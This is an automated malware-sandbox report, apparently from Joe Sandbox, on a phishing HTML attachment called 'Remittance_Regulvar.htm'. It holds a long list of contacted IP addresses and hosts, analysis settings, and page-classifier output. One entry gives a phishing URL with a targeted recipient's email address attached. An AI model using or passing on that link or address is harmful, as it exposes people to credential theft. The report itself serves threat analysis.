                                                                                                                                                                                                                                                                                                                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.67.149.20
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.208.164.79
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.95.115.196
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.66.102.106
                                                                                                                                                                                                                                                                                                                                                                                                                  d1giprow6b9psh.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.157.230.4
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  208.93.169.131
                                                                                                                                                                                                                                                                                                                                                                                                                  am1-direct-bgp.contextweb.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  26228SERVEPATHUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  87.248.119.251
                                                                                                                                                                                                                                                                                                                                                                                                                  edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  87.248.119.252
                                                                                                                                                                                                                                                                                                                                                                                                                  edge-prebid-cdn.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  141.226.228.48
                                                                                                                                                                                                                                                                                                                                                                                                                  am-vip001.taboola.comIsrael
                                                                                                                                                                                                                                                                                                                                                                                                                  200478TABOOLA-ASILfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.171.65.146
                                                                                                                                                                                                                                                                                                                                                                                                                  sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.215.157.212
                                                                                                                                                                                                                                                                                                                                                                                                                  idaas-ext.cph.liveintent.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.202.150.204
                                                                                                                                                                                                                                                                                                                                                                                                                  dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  185.89.210.46
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownGermany
                                                                                                                                                                                                                                                                                                                                                                                                                  29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.9
                                                                                                                                                                                                                                                                                                                                                                                                                  widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.7
                                                                                                                                                                                                                                                                                                                                                                                                                  ssp-sync.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  20.47.117.32
                                                                                                                                                                                                                                                                                                                                                                                                                  gw-c-eu-isp.temu.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  8069MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  static.nl3.vip.prod.criteo.netFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  130.211.44.5
                                                                                                                                                                                                                                                                                                                                                                                                                  rtbc-ew1.doubleverify.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.102.163.6
                                                                                                                                                                                                                                                                                                                                                                                                                  ad.mrtnsvr.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.161.82.9
                                                                                                                                                                                                                                                                                                                                                                                                                  consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.122.38.117
                                                                                                                                                                                                                                                                                                                                                                                                                  tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.22.50.98
                                                                                                                                                                                                                                                                                                                                                                                                                  mwzeom.zeotap.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  46.228.174.117
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.1rx.ioUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  56396TURNGBfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.58.104.46
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.84.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                  d162h6x3rxav67.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  27281QUANTCASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.66.102.127
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.37.193
                                                                                                                                                                                                                                                                                                                                                                                                                  a.tribalfusion.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  103.67.200.72
                                                                                                                                                                                                                                                                                                                                                                                                                  1.cpm.ak-is2.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.95.115.255
                                                                                                                                                                                                                                                                                                                                                                                                                  aax-eu.amazon-adsystem.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.160.150.74
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.intentiq.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.184.119.72
                                                                                                                                                                                                                                                                                                                                                                                                                  match-eu-central-1-ecs.sharethrough.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  142.250.184.226
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  198.47.127.20
                                                                                                                                                                                                                                                                                                                                                                                                                  spug-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.77.21.133
                                                                                                                                                                                                                                                                                                                                                                                                                  euw-ice.360yield.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.245.60.76
                                                                                                                                                                                                                                                                                                                                                                                                                  sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.214.241.248
                                                                                                                                                                                                                                                                                                                                                                                                                  httplb-gce-nl-clickdistrict.clickdistrict.iponweb.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.124.64.248
                                                                                                                                                                                                                                                                                                                                                                                                                  eu-tlx.3lift.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  142.250.184.230
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.75.62.37
                                                                                                                                                                                                                                                                                                                                                                                                                  ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.16.119.152
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.67.231.10
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  69.49.245.172
                                                                                                                                                                                                                                                                                                                                                                                                                  mollysirishpub-tol.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.95.41
                                                                                                                                                                                                                                                                                                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.36.155
                                                                                                                                                                                                                                                                                                                                                                                                                  htlb.casalemedia.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.38.76
                                                                                                                                                                                                                                                                                                                                                                                                                  cdn.indexww.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.214.132.90
                                                                                                                                                                                                                                                                                                                                                                                                                  rome-stable-europe-west4.pumpkin.uverse.iponweb.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  23.22.128.83
                                                                                                                                                                                                                                                                                                                                                                                                                  dt-external-217593033.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  198.47.127.19
                                                                                                                                                                                                                                                                                                                                                                                                                  pugm-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  198.47.127.18
                                                                                                                                                                                                                                                                                                                                                                                                                  imgsync-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.216.254.79
                                                                                                                                                                                                                                                                                                                                                                                                                  blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.56
                                                                                                                                                                                                                                                                                                                                                                                                                  in-ftd-65.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.217.18.102
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.197.252.142
                                                                                                                                                                                                                                                                                                                                                                                                                  ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.91.62.186
                                                                                                                                                                                                                                                                                                                                                                                                                  um.simpli.fiUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.217.16.198
                                                                                                                                                                                                                                                                                                                                                                                                                  s0.2mdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  82.145.213.8
                                                                                                                                                                                                                                                                                                                                                                                                                  outspot2-ams.adx.opera.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  39832NO-OPERANOfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.117.239.71
                                                                                                                                                                                                                                                                                                                                                                                                                  events-ssc.33across.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  66.218.84.42
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  26101YAHOO-3USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  66.218.84.43
                                                                                                                                                                                                                                                                                                                                                                                                                  rwf9bb5hj.wc.06yahoo.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  26101YAHOO-3USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.71.149.231
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.94.41
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.64.151.101
                                                                                                                                                                                                                                                                                                                                                                                                                  ssum.casalemedia.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.249.71.81
                                                                                                                                                                                                                                                                                                                                                                                                                  prod-rotation-v2.guce.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.86.42.133
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  195.5.165.20
                                                                                                                                                                                                                                                                                                                                                                                                                  core.iprom.netSlovenia
                                                                                                                                                                                                                                                                                                                                                                                                                  44968IPROM-ASSIfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  27.123.42.200
                                                                                                                                                                                                                                                                                                                                                                                                                  cerebro-dns-report.wc.yahoodns.netHong Kong
                                                                                                                                                                                                                                                                                                                                                                                                                  10310YAHOO-1USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  87.248.116.89
                                                                                                                                                                                                                                                                                                                                                                                                                  ybar-ca9s256c5jreport.wc.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  203219YAHOO-AMANLfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.160.189.7
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.ipredictive.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  67.202.105.33
                                                                                                                                                                                                                                                                                                                                                                                                                  de.tynt.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  98.82.154.76
                                                                                                                                                                                                                                                                                                                                                                                                                  s.amazon-adsystem.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  192.132.33.67
                                                                                                                                                                                                                                                                                                                                                                                                                  bttrack.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  18568BIDTELLECTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.194.157.40
                                                                                                                                                                                                                                                                                                                                                                                                                  dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  142.250.74.196
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.161.82.22
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  74.6.143.26
                                                                                                                                                                                                                                                                                                                                                                                                                  yahoo.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  26101YAHOO-3USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                  Analysis ID:1529327
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date and time:2024-10-08 21:12:03 +02:00
                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                  Overall analysis duration:0h 8m 5s
                                                                                                                                                                                                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                  Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                  Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                  Sample name:Remittance_Regulvar.htm
                                                                                                                                                                                                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                  Classification:mal60.phis.evad.winHTM@83/1592@925/100
                                                                                                                                                                                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Found application associated with file extension: .htm
                                                                                                                                                                                                                                                                                                                                                                                                                  • Browse: https://finance.yahoo.com/crypto/
                                                                                                                                                                                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.217.18.14, 74.125.71.84, 142.250.184.227, 34.104.35.123, 142.250.186.106, 172.217.18.10, 142.250.184.202, 216.58.206.74, 142.250.186.42, 142.250.186.74, 142.250.181.234, 142.250.186.170, 142.250.185.106, 216.58.212.138, 172.217.16.202, 142.250.185.138, 142.250.186.138, 142.250.185.74, 216.58.206.42, 172.217.23.106, 93.184.221.240, 192.229.221.95, 131.107.255.255, 142.250.185.234, 142.250.185.202, 142.250.184.234, 172.217.18.106, 142.250.185.170, 104.18.186.31, 104.18.187.31, 216.58.206.67, 69.173.156.139, 104.19.158.19, 104.19.159.19, 184.28.88.244, 88.221.169.246, 69.173.144.139, 69.173.144.165, 69.173.144.138, 13.107.42.14, 37.157.2.229, 37.157.2.228, 37.157.3.26, 37.157.2.233, 37.157.2.230, 104.102.34.86, 193.0.160.131, 204.79.197.237, 13.107.21.237, 151.101.130.49, 151.101.194.49, 151.101.66.49, 151.101.2.49, 64.158.223.137, 63.215.202.169, 37.157.5.84, 37.157.5.133, 37.157.4.28, 37.157.4.29, 37.157.5.132, 37.157.5.87, 172.217.18.110, 185.89.208.11, 23.212.88.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): tags.bluekai.com.edgekey.net, a267.g.akamai.net, azurefd-t-fb-prod.trafficmanager.net, uipglob.trafficmanager.net, slscr.update.microsoft.com, usersync-geo-global.usersync-prod-sas.akadns.net, clientservices.googleapis.com, tps-geo.dvgtm.akadns.net, dns.msftncsi.com, track-eu.adformnet.akadns.net, l-0005.l-msedge.net, e9126.x.akamaiedge.net, cdn.doubleverify.com.edgesuite.net, clients2.google.com, ocsp.digicert.com, as.jivox.com.cdn.cloudflare.net, e119011.b.akamaiedge.net, update.googleapis.com, rtb-csync-geo.usersync-prod-sas.akadns.net, www.gstatic.com, e9957.e4.akamaiedge.net, fs.microsoft.com, e8960.b.akamaiedge.net, content-autofill.googleapis.com, c-bing-com.dual-a-0034.a-msedge.net, ajax.googleapis.com, pixel-us-east.rubiconproject.net.akadns.net, a-emea.rfihub.com.akadns.net, pagead2.googlesyndication.com, edgedl.me.gvt1.com, c.bing.com, e6603.g.akamaiedge.net, eus.rubiconproject.com.edgekey.net, map.media6degrees.com.cdn.cloudflare.net, a1241.dsct.akamai
                                                                                                                                                                                                                                                                                                                                                                                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                  • VT rate limit hit for: Remittance_Regulvar.htm
                                                                                                                                                                                                                                                                                                                                                                                                                  No simulations
                                                                                                                                                                                                                                                                                                                                                                                                                  InputOutput
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://ortkn.lovationyme.com/5wLmN/#E#Mfmassicotte@regulvar.com Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":[],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "text":"Ensuring your connection is secure by checking your browser.",
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://ortkn.lovationyme.com/5wLmN/#E#Mfmassicotte@regulvar.com Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":["CLOUDFLARE"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "text":"Verifying... Ensuring your connection is secure by checking your browser.",
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":["yahoo"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"Mail",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "text":"We're building a new yahoo.com to show more of what's interesting to you. Try it out",
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":["Yahoo"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":["Search the web"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "text":"We're building a new yahoo.com to show more of what's interesting to you. Try it out",
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":["Yahoo"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":["Search the web"],
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "text":"We're building a new yahoo.com to show more of what's interesting to you. Try it out",
                                                                                                                                                                                                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                                                                  URL: https://finance.yahoo.com/markets/crypto/all/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                  "brand":[],
                                                                                                                                                                                                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                                                                  "pdf_icon_visible":false,
